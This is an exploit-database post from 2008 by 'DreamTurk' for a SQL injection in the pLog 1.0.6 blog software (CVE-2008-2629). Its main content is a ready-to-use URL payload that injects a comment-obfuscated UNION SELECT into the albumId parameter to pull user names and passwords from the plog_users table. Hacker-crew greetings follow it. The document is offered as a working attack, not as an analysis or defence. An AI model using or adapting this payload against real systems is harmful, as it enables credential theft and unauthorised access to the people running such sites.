PLog 1.0.6 - 'albumID' SQL Injection

Related Vulnerabilities: CVE-2008-2629  
Publish Date: 02 Jun 2008
Author: DreamTurk
                							

                pLog (albumId) Remote Sql Ä°nj.

DreamTurk / dream@dr3amturk.org

Down : http://sourceforge.net/project/showfiles.php?group_id=83964&package_id=86556

http://localhost/index.php?op=ViewAlbum&albumId=-1/**/union/**/select/**/0,1,user,password,4,5,6,7,8 from plog_users/*&blogId=1

4ever sqL L0v3r'Z Crew 2008 http://coderx.org

Greatz : Cr@zy_King & BLasTer & DarKxBoyZ & Rmx & TR_ip & str0ke

----------- 

# milw0rm.com [2008-06-02]